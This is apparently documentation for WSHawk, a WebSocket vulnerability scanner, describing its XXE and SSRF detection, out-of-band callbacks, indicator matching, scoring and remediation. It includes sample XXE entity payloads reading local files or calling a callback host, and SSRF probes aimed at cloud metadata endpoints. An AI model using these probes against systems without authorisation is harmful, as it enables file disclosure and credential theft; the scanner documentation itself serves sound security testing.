XXE and SSRF Detection

This page documents WSHawk's detection methodologies for XML External Entity (XXE) and Server-Side Request Forgery (SSRF) vulnerabilities in WebSocket applications. These vulnerabilities enable attackers to read local files, access internal network resources, and exfiltrate data through out-of-band channels.

For general injection vulnerability detection (SQL, NoSQL, Command, LDAP), see Injection Vulnerabilities. For blind vulnerability detection infrastructure, see OAST Blind Vulnerability Detection.


XXE Detection Overview

WSHawk detects XXE vulnerabilities by sending XML payloads containing entity definitions that trigger external resource loading. Detection occurs through two mechanisms:

  1. Direct Response Analysis: Observing entity content reflected in responses
  2. OAST Callbacks: Out-of-band detection when entities trigger external DNS/HTTP requests

The scanner operates in both legacy mode (wshawk/main.py:665-704) and enhanced v2 mode (wshawk/scanner_v2.py:450-504) with optional OAST integration.

Detection Confidence Levels:

  • HIGH: Entity content reflected in response OR OAST callback received
  • MEDIUM: XML parsing errors suggesting entity processing
  • LOW: No definitive indicators

XXE Detection Architecture

graph TB
    subgraph "XXE Detection Pipeline"
        PayloadSource["WSPayloads.get_xxe()<br/>payloads/xxe.txt"]
        Injector["Message Injector<br/>MessageAnalyzer<br/>inject_payload_into_message()"]
        OASTGen["OASTProvider<br/>generate_payload('xxe')"]
        WSConn["WebSocket Connection<br/>ws.send()"]
        Response["Response Collector<br/>ws.recv()"]
        Verifier["VulnerabilityVerifier<br/>verify_xxe()"]
        OASTCheck["OAST Callback Monitor<br/>check_callbacks()"]
    end
    
    subgraph "Detection Indicators"
        DirectInd["Direct Indicators<br/><!entity<br/>system<br/>file://<br/>root:"]
        ErrorInd["Error Indicators<br/>XML Parse Error<br/>Entity Error"]
        OASTInd["OAST Indicators<br/>DNS Query<br/>HTTP Callback"]
    end
    
    PayloadSource -->|"Static payloads"| Injector
    OASTGen -->|"OAST-enabled payload"| Injector
    Injector -->|"JSON-wrapped XML"| WSConn
    WSConn --> Response
    Response --> Verifier
    Response --> OASTCheck
    
    Verifier --> DirectInd
    Verifier --> ErrorInd
    OASTCheck --> OASTInd
    
    DirectInd -->|"HIGH confidence"| VulnReport["Vulnerability Report<br/>type: XXE<br/>severity: CRITICAL"]
    ErrorInd -->|"MEDIUM confidence"| VulnReport
    OASTInd -->|"HIGH confidence"| VulnReport

Sources: wshawk/scanner_v2.py:450-504, wshawk/main.py:665-704


XXE Payload Sources and Injection

Payload Collection

XXE payloads are loaded from the static collection at runtime:

| Method | File | Purpose |
|--------|------|---------|
| WSPayloads.get_xxe() | wshawk/payloads/xxe.txt | Loads entity injection vectors |
| Default limit | 30 payloads | Performance-optimized subset in v2 |

Sources: wshawk/main.py:129-130, wshawk/scanner_v2.py:455

Injection Strategy

graph LR
    subgraph "Legacy Scanner Flow"
        XXEPayload["XXE Payload<br/><!DOCTYPE...>"]
        DirectSend["Direct WebSocket Send<br/>payload as string"]
    end
    
    subgraph "V2 Scanner Flow"
        XXEPayloadV2["XXE Payload"]
        MessageWrap["JSON Wrapper<br/>{action: 'parse_xml'<br/>xml: payload}"]
        OASTSubst["OAST Substitution<br/>Replace callback URL"]
        ContextInject["Context-Aware Injection<br/>MessageAnalyzer"]
    end
    
    XXEPayload --> DirectSend
    XXEPayloadV2 --> OASTSubst
    OASTSubst --> MessageWrap
    MessageWrap --> ContextInject
    
    ContextInject -->|"Learns from samples"| Structured["JSON Field Injection<br/>xml, data, content"]

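Key Differences:

  • Legacy scanner: sends each XXE payload directly over the WebSocket as a raw string.
  • V2 scanner: substitutes the OAST callback URL into the payload, wraps it in a JSON message (action: 'parse_xml', xml: payload), and uses MessageAnalyzer to inject it into fields learned from sample traffic (xml, data, content).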
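
As a rough illustration of the two flows in the diagram, the sketch below wraps a raw XML payload in a JSON message. The function name wrap_xxe_payload and the example payload are hypothetical and are not taken from the WSHawk source; only the wrapper keys (action, xml) come from the diagram.

```python
import json


def wrap_xxe_payload(xml_payload: str, field: str = "xml") -> str:
    """Wrap a raw XML payload in a JSON message (hypothetical helper).

    The 'action' value and default field name mirror the wrapper shown in
    the diagram; 'field' can be switched to e.g. 'data' or 'content'.
    """
    message = {"action": "parse_xml", field: xml_payload}
    return json.dumps(message)


# Illustrative payload only; real payloads come from payloads/xxe.txt.
payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<r>&xxe;</r>"
)

legacy_frame = payload                 # legacy flow: raw string on the wire
v2_frame = wrap_xxe_payload(payload)   # v2 flow: JSON-wrapped XML
```

json.dumps handles the escaping of quotes and angle brackets inside the XML, so the payload survives the round trip through a JSON parser unchanged.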

Sources: wshawk/scanner_v2.py:468-477, wshawk/main.py:682


XXE Detection Methodology

Response Analysis

The VulnerabilityVerifier class performs pattern matching on responses to identify entity processing:

Detection Indicators (wshawk/scanner_v2.py:484-485):

xxe_indicators = ['<!entity', 'system', 'file://', 'root:', 'XML Parse Error']

Detection Logic:

  1. Convert the response to lowercase.
  2. Check whether any indicator occurs in it.
  3. On a match, record a HIGH confidence vulnerability.
  4. Report that entity processing was detected.
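
The steps above can be sketched as a small classifier. This is an illustration, not the VulnerabilityVerifier implementation: the function name and the tiered HIGH/MEDIUM/LOW mapping are assumptions that combine the indicator lists from the architecture diagram with the confidence levels listed earlier. Indicators are stored in lowercase because the response is lowercased before matching; a mixed-case entry such as 'XML Parse Error' would otherwise never match.

```python
# Indicator groups follow the architecture diagram; all entries are lowercase
# so they can be compared against a lowercased response.
DIRECT_INDICATORS = ("<!entity", "system", "file://", "root:")
ERROR_INDICATORS = ("xml parse error", "entity error")


def classify_xxe_response(response: str, oast_callback: bool = False) -> str:
    """Return 'HIGH', 'MEDIUM', or 'LOW' for one response (hypothetical helper)."""
    text = response.lower()
    # Reflected entity content or an out-of-band callback is the strongest signal.
    if oast_callback or any(ind in text for ind in DIRECT_INDICATORS):
        return "HIGH"
    # Parser errors only suggest that entities were processed.
    if any(ind in text for ind in ERROR_INDICATORS):
        return "MEDIUM"
    return "LOW"
```

Short substrings such as 'system' also occur in ordinary responses, so a match is best treated as a lead to verify rather than proof.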

Sources: wshawk/scanner_v2.py:484-495, wshawk/main.py:685-686

OAST Integration Flow

sequenceDiagram
    participant Scanner as "WSHawkV2"
    participant OAST as "OASTProvider"
    participant Target as "WebSocket Target"
    participant DNS as "interact.sh DNS"
    
    Scanner->>OAST: start()
    OAST->>DNS: Register callback domain
    DNS-->>OAST: unique_id.interact.sh
    
    Scanner->>OAST: generate_payload('xxe', 'test0')
    OAST-->>Scanner: <!ENTITY xxe SYSTEM "http://unique.interact.sh">
    
    Scanner->>Target: send(xml_payload)
    Note over Target: Parser processes entity
    Target->>DNS: DNS query for unique.interact.sh
    
    Scanner->>OAST: check_callbacks('test0')
    OAST->>DNS: Poll for callbacks
    DNS-->>OAST: [DNS query detected]
    OAST-->>Scanner: True (blind XXE confirmed)
    
    Scanner->>Scanner: vulnerabilities.append({type: 'XXE', confidence: 'HIGH'})

OAST Start Condition (wshawk/scanner_v2.py:458-465):

if self.use_oast and not self.oast_provider:
    self.oast_provider = OASTProvider(use_interactsh=False, custom_server="localhost:8888")
    await self.oast_provider.start()

Payload Generation (wshawk/scanner_v2.py:471):

oast_payload = self.oast_provider.generate_payload('xxe', f'test{len(results)}')
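
To make the callback correlation concrete, the following sketch builds an XXE payload whose entity points at a unique callback host and then checks a list of logged interactions for that token. It does not reproduce OASTProvider: build_oast_xxe_payload, callback_seen, and the domain oast.example are hypothetical stand-ins.

```python
import uuid


def build_oast_xxe_payload(callback_domain: str, tag: str) -> tuple[str, str]:
    """Return (token, payload); the token identifies this probe in callbacks."""
    token = f"{tag}-{uuid.uuid4().hex[:8]}".lower()
    host = f"{token}.{callback_domain}"
    payload = (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "http://{host}/">]>'
        "<data>&xxe;</data>"
    )
    return token, payload


def callback_seen(token: str, interactions: list[str]) -> bool:
    """True if any logged DNS/HTTP interaction mentions the probe token."""
    return any(token in entry.lower() for entry in interactions)


token, payload = build_oast_xxe_payload("oast.example", "test0")
```

Embedding the token in the hostname means a DNS lookup alone is enough to attribute the callback to a specific payload, even when the HTTP request itself is blocked.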

Sources: wshawk/scanner_v2.py:458-477


SSRF Detection Overview

SSRF detection tests whether the WebSocket application fetches arbitrary URLs provided by the client, potentially exposing internal network resources and cloud metadata services.

Attack Surface: Any WebSocket message field that accepts URLs or triggers server-side HTTP requests:

  • Image fetching
  • URL preview generation
  • Webhook notifications
  • External API integration

Sources: wshawk/scanner_v2.py:546-591


SSRF Target Selection

WSHawk tests a curated list of high-value internal targets:

graph TB
    subgraph "Internal Network Targets"
        Localhost["http://localhost<br/>http://127.0.0.1<br/>Loopback access"]
        Private["http://192.168.1.1<br/>http://10.0.0.1<br/>http://172.16.0.1<br/>RFC1918 ranges"]
    end
    
    subgraph "Cloud Metadata Services"
        AWS["http://169.254.169.254/latest/meta-data/<br/>AWS EC2 metadata"]
        GCP["http://metadata.google.internal<br/>Google Cloud metadata"]
    end
    
    subgraph "Detection Strategy"
        Localhost --> ResponseCheck["Response Analysis<br/>Connection refused?<br/>Timeout?<br/>Internal data?"]
        Private --> ResponseCheck
        AWS --> ResponseCheck
        GCP --> ResponseCheck
        
        ResponseCheck --> Indicators["SSRF Indicators<br/>connection refused<br/>timeout<br/>metadata<br/>instance-id"]
    end

Target List (wshawk/scanner_v2.py:551-556):

internal_targets = [
    'http://localhost',
    'http://127.0.0.1',
    'http://169.254.169.254/latest/meta-data/',  # AWS metadata
    'http://metadata.google.internal',            # GCP metadata
]

Sources: wshawk/scanner_v2.py:551-556


SSRF Detection Methodology

Message Construction

SSRF payloads are injected into URL-accepting JSON fields:

Injection Pattern (wshawk/scanner_v2.py:562):

{
  "action": "fetch_url",
  "url": "http://169.254.169.254/latest/meta-data/"
}
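
A minimal sketch of how such messages could be produced for every target in the list. The helper name build_ssrf_messages is hypothetical; the action and url keys follow the injection pattern above.

```python
import json

# Same targets as the list quoted from scanner_v2.py.
INTERNAL_TARGETS = [
    "http://localhost",
    "http://127.0.0.1",
    "http://169.254.169.254/latest/meta-data/",  # AWS metadata
    "http://metadata.google.internal",           # GCP metadata
]


def build_ssrf_messages(targets, action="fetch_url", field="url"):
    """Return one JSON-encoded WebSocket message per target URL."""
    return [json.dumps({"action": action, field: target}) for target in targets]


messages = build_ssrf_messages(INTERNAL_TARGETS)
```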

Response Verification

graph TB
    SendSSRF["Send SSRF Payload<br/>ws.send(msg)"]
    ReceiveResp["Receive Response<br/>ws.recv() with 3s timeout"]
    AnalyzeResp["Response Analysis<br/>Check for indicators"]
    
    subgraph "Response Indicators"
        ConnRefused["'connection refused'<br/>Internal port accessible but closed"]
        Timeout["'timeout'<br/>Firewall blocking egress"]
        Metadata["'metadata'<br/>'instance-id'<br/>Cloud metadata leaked"]
        Localhost["'localhost'<br/>Loopback reference"]
    end
    
    SendSSRF --> ReceiveResp
    ReceiveResp --> AnalyzeResp
    
    AnalyzeResp --> ConnRefused
    AnalyzeResp --> Timeout
    AnalyzeResp --> Metadata
    AnalyzeResp --> Localhost
    
    ConnRefused --> HighConf["HIGH Confidence<br/>SSRF Vulnerability"]
    Timeout --> HighConf
    Metadata --> HighConf
    Localhost --> HighConf

Detection Logic (wshawk/scanner_v2.py:570-572):

ssrf_indicators = ['connection refused', 'timeout', 'metadata', 'instance-id', 'localhost']
if any(ind.lower() in response.lower() for ind in ssrf_indicators):
    # SSRF detected: record the finding (report structure shown below)
    self.vulnerabilities.append({...})

Vulnerability Report Structure (wshawk/scanner_v2.py:573-581):

{
    'type': 'Server-Side Request Forgery (SSRF)',
    'severity': 'HIGH',
    'confidence': 'HIGH',
    'description': f'SSRF vulnerability - accessed {target}',
    'payload': target,
    'response_snippet': response[:200],
    'recommendation': 'Validate and whitelist allowed URLs'
}
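
The detection check and the report structure can be combined into one function, sketched below under assumptions: build_ssrf_finding and the extra matched_indicators field are hypothetical additions for illustration, while the remaining keys mirror the report structure above.

```python
from typing import Optional

SSRF_INDICATORS = ("connection refused", "timeout", "metadata", "instance-id", "localhost")


def build_ssrf_finding(target: str, response: str) -> Optional[dict]:
    """Return a finding dict if the response matches an indicator, else None."""
    text = response.lower()
    matched = [ind for ind in SSRF_INDICATORS if ind in text]
    if not matched:
        return None
    return {
        "type": "Server-Side Request Forgery (SSRF)",
        "severity": "HIGH",
        "confidence": "HIGH",
        "description": f"SSRF vulnerability - accessed {target}",
        "payload": target,
        "response_snippet": response[:200],  # keep the report compact
        "recommendation": "Validate and whitelist allowed URLs",
        "matched_indicators": matched,  # hypothetical field, aids triage
    }
```

Recording which indicator matched helps with triage: a server that merely echoes the submitted URL back in an error message would match 'localhost' without having fetched anything.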

Sources: wshawk/scanner_v2.py:546-591


Rate Limiting and Resilience

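Both XXE and SSRF tests throttle their traffic to avoid overloading the target and triggering detection. The XXE test uses a fixed delay between payloads, while the SSRF test goes through the configured rate limiter: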

XXE Rate Limiting (wshawk/scanner_v2.py:500):

await asyncio.sleep(0.05)  # 50ms delay between payloads

SSRF Rate Limiting (wshawk/scanner_v2.py:560):

await self.rate_limiter.acquire()  # Token bucket rate control
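
For readers unfamiliar with token buckets, here is a generic asyncio sketch of the technique. It is not WSHawk's rate limiter: the class name, constructor parameters, and the injectable clock are assumptions made for illustration and testability.

```python
import asyncio
import time


class TokenBucket:
    """Generic token bucket: 'rate' tokens per second, up to 'capacity'."""

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)  # start full so bursts are allowed
        self.clock = clock
        self.updated = clock()

    def _refill(self) -> None:
        # Add tokens for the time elapsed since the last update, capped at capacity.
        now = self.clock()
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now

    def try_acquire(self) -> bool:
        """Take one token if available; never blocks."""
        self._refill()
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

    async def acquire(self) -> None:
        """Wait until a token is available, then take it."""
        while not self.try_acquire():
            # Sleep roughly as long as it takes to accumulate the missing fraction.
            await asyncio.sleep((1 - self.tokens) / self.rate)
```

Unlike a fixed sleep, the bucket permits a short burst up to its capacity and then settles at the configured average rate.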

Timeout Configuration:
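
The response verification diagram above cites a 3-second receive timeout for SSRF; the XXE value is not stated on this page. A minimal sketch of bounding a receive call with asyncio.wait_for follows. The helper recv_with_timeout is hypothetical, and ws stands for any object with an awaitable recv() method.

```python
import asyncio
from typing import Optional


async def recv_with_timeout(ws, seconds: float = 3.0) -> Optional[str]:
    """Return the next message, or None if nothing arrives within 'seconds'."""
    try:
        return await asyncio.wait_for(ws.recv(), timeout=seconds)
    except asyncio.TimeoutError:
        # No reply in time; the caller moves on to the next payload.
        return None
```

Returning None rather than raising keeps the payload loop simple: a silent target is treated as "no indicator found" for that payload.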

Sources: wshawk/scanner_v2.py:500, wshawk/scanner_v2.py:560, wshawk/scanner_v2.py:480, wshawk/scanner_v2.py:567


Integration with Scan Workflow

Heuristic Scan Integration

Both XXE and SSRF tests are integrated into the main run_heuristic_scan() workflow:

graph TB
    Start["run_heuristic_scan()"]
    Connect["WebSocket Connect"]
    Learning["Learning Phase<br/>5 seconds"]
    SQLi["test_sql_injection_v2()"]
    XSS["test_xss_v2()"]
    Cmd["test_command_injection_v2()"]
    PathTrav["test_path_traversal_v2()"]
    XXE["test_xxe_v2()<br/>Line 628"]
    NoSQL["test_nosql_injection_v2()"]
    SSRF["test_ssrf_v2()<br/>Line 634"]
    Session["SessionHijackingTester"]
    Report["Generate Report"]
    
    Start --> Connect
    Connect --> Learning
    Learning --> SQLi
    SQLi --> XSS
    XSS --> Cmd
    Cmd --> PathTrav
    PathTrav --> XXE
    XXE --> NoSQL
    NoSQL --> SSRF
    SSRF --> Session
    Session --> Report

Call Sites (line numbers as given in the diagram above):

  • test_xxe_v2(): line 628
  • test_ssrf_v2(): line 634

Sources: wshawk/scanner_v2.py:593-852


Configuration

Scanner V2 Configuration

XXE and SSRF detection are controlled through the scanner configuration:

OAST Toggle (wshawk/scanner_v2.py:82-83):

self.use_oast = True
self.oast_provider = None

CLI Override (wshawk/advanced_cli.py:41-42):

wshawk-advanced ws://target.com --no-oast  # Disable OAST testing

Full Feature Mode (wshawk/advanced_cli.py:174-177):

wshawk-advanced ws://target.com --full  # Enables OAST + Playwright + Smart Payloads

Configuration File

The hierarchical configuration system supports OAST and scanning feature toggles:

scanner:
  rate_limit: 10
  features:
    oast: true
    playwright: true
    smart_payloads: false

Configuration Loading (wshawk/scanner_v2.py:48-53):

if config is None:
    from .config import WSHawkConfig
    self.config = WSHawkConfig.load()
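
One way to picture how a configuration file and the --no-oast flag could combine is sketched below. This is an assumption-laden illustration, not WSHawkConfig: the DEFAULTS values, deep_merge, and resolve_use_oast are hypothetical, and the precedence shown (CLI flag over file over defaults) is assumed.

```python
# Hypothetical defaults, shaped like the YAML example above.
DEFAULTS = {
    "scanner": {
        "rate_limit": 10,
        "features": {"oast": True, "playwright": False, "smart_payloads": False},
    }
}


def deep_merge(base: dict, override: dict) -> dict:
    """Return a new dict where nested keys in 'override' replace those in 'base'."""
    merged = dict(base)
    for key, value in override.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = value
    return merged


def resolve_use_oast(file_config: dict, no_oast_flag: bool) -> bool:
    """OAST is on only if the merged config enables it and the CLI did not disable it."""
    config = deep_merge(DEFAULTS, file_config)
    return bool(config["scanner"]["features"]["oast"]) and not no_oast_flag
```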

Sources: wshawk/scanner_v2.py:82-83, wshawk/advanced_cli.py:41-42, wshawk/advanced_cli.py:174-177, wshawk/scanner_v2.py:48-53


Vulnerability Reporting

Report Structure

XXE and SSRF findings are appended to the vulnerabilities list with standardized metadata:

XXE Report Fields:

  • type: "XML External Entity (XXE)"
  • severity: "HIGH" or "CRITICAL"
  • confidence: "HIGH" (direct detection) or "MEDIUM" (error-based)
  • description: Entity processing evidence
  • payload: Triggering XML payload (truncated to 80 chars)
  • response_snippet: First 200 chars of response
  • recommendation: "Disable external entity processing"

SSRF Report Fields:

  • type: "Server-Side Request Forgery (SSRF)"
  • severity: "HIGH"
  • confidence: "HIGH"
  • description: Accessed internal target details
  • payload: Internal URL that was fetched
  • response_snippet: First 200 chars of response
  • recommendation: "Validate and whitelist allowed URLs"

Vulnerability Append (wshawk/scanner_v2.py:486-495, wshawk/scanner_v2.py:573-581):

self.vulnerabilities.append({...})

CVSS Scoring

XXE and SSRF vulnerabilities receive CVSS v3.1 scores based on their severity:

| Vulnerability | Base Score | Vector |
|---------------|------------|--------|
| XXE (File Read) | 7.5 - 8.6 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| XXE (RCE) | 9.8 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| SSRF (Metadata) | 8.6 | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
| SSRF (Internal) | 7.5 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
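
The base scores in the table can be reproduced from their vectors with the CVSS v3.1 base score equations. The sketch below is a standalone calculator written for this page, not part of WSHawk; it covers base metrics only.

```python
import math

# Metric weights from the CVSS v3.1 specification.
W = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether scope is Unchanged or Changed.
PR = {"U": {"N": 0.85, "L": 0.62, "H": 0.27}, "C": {"N": 0.85, "L": 0.68, "H": 0.5}}


def roundup(value: float) -> float:
    """Round up to one decimal place as defined in CVSS v3.1."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a vector such as 'AV:N/AC:L/.../A:N'."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    iss = 1 - (1 - W["C"][m["C"]]) * (1 - W["I"][m["I"]]) * (1 - W["A"][m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * W["AV"][m["AV"]] * W["AC"][m["AC"]] * PR[m["S"]][m["PR"]] * W["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total, 10)) if changed else roundup(min(total, 10))
```

With scope unchanged (S:U), the file-read vector evaluates to 7.5; the same vector with scope changed (S:C) evaluates to 8.6, which accounts for the upper end of the range in the first row.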

Sources: wshawk/scanner_v2.py:486-495, wshawk/scanner_v2.py:573-581


Legacy Scanner Comparison

The legacy scanner (wshawk/main.py:665-704) implements basic XXE detection without OAST support:

Key Differences:

| Feature | Legacy Scanner | V2 Scanner |
|---------|----------------|------------|
| OAST Integration | ❌ No | ✅ Yes |
| Context-Aware Injection | ❌ No | ✅ Yes with MessageAnalyzer |
| Rate Limiting | ✅ Fixed 0.1s delay | ✅ Token bucket with adaptive control |
| SSRF Detection | ❌ Not implemented | ✅ Implemented |
| Payload Limit | Configurable via max_payloads | Fixed 30 for performance |
| Confidence Scoring | ❌ Basic severity | ✅ ConfidenceLevel enum |

Legacy XXE Test (wshawk/main.py:665-704):

  • Uses WSPayloads.get_xxe() without OAST
  • Direct pattern matching on indicators
  • Appends to self.vulnerabilities with basic structure

Sources: wshawk/main.py:665-704, wshawk/scanner_v2.py:450-504, wshawk/scanner_v2.py:546-591


Remediation Recommendations

WSHawk provides actionable remediation guidance for each detected vulnerability:

XXE Remediation

Recommendation (wshawk/scanner_v2.py:493):

"Disable external entity processing"

Technical Implementation:

  1. Disable DTD processing entirely
  2. Disable external entity resolution
  3. Use safe XML parser configurations:
    • Python: defusedxml library
    • Java: XMLConstants.FEATURE_SECURE_PROCESSING
    • PHP: libxml_disable_entity_loader(true) (deprecated as of PHP 8.0, where external entity loading is disabled by default)
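
For Python, the list above points to defusedxml. The sketch below shows the underlying idea using only the standard library, so it runs without extra dependencies: reject any document that carries a DOCTYPE declaration before handing it to the normal parser. The names DTDForbidden and parse_xml_without_dtd are hypothetical; in production code the defusedxml package is the more complete option.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_xml_without_dtd(text: str) -> ET.Element:
    """Parse XML, refusing any document that declares a DTD."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Entities can only be declared inside a DTD, so refusing the
        # DOCTYPE blocks internal and external entity definitions alike.
        raise DTDForbidden(f"DOCTYPE declaration not allowed: {name!r}")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject_doctype
    checker.Parse(text, True)  # raises DTDForbidden, or ExpatError if malformed
    return ET.fromstring(text)
```

Refusing DTDs outright corresponds to the first item in the list and is the simplest policy to reason about, at the cost of rejecting documents that legitimately use a DOCTYPE.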

SSRF Remediation

Recommendation (wshawk/scanner_v2.py:580):

"Validate and whitelist allowed URLs"

Technical Implementation:

  1. Implement URL whitelist validation
  2. Block access to private IP ranges (RFC1918)
  3. Block cloud metadata endpoints
  4. Use network-level egress filtering
  5. Implement request timeout limits
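
Items 1 to 3 can be sketched as a single validation function. This is an illustrative example, not WSHawk code: is_url_allowed and the allowlist contents are hypothetical, and the check deliberately skips DNS resolution.

```python
import ipaddress
from urllib.parse import urlsplit


def is_url_allowed(url: str, allowed_hosts: set[str]) -> bool:
    """Allow only http(s) URLs whose host is allowlisted and not an internal IP."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # host is a name, not an IP literal
    if ip is not None and (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_reserved or ip.is_multicast or ip.is_unspecified
    ):
        # Covers RFC1918 ranges, loopback, and 169.254.169.254 (cloud metadata),
        # even if such an address was added to the allowlist by mistake.
        return False
    return host in allowed_hosts
```

A hostname that passes this check can still resolve to an internal address, so a fuller implementation would also validate the resolved IP at connection time and pair the check with the network-level egress filtering from item 4.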

Sources: wshawk/scanner_v2.py:493, wshawk/scanner_v2.py:580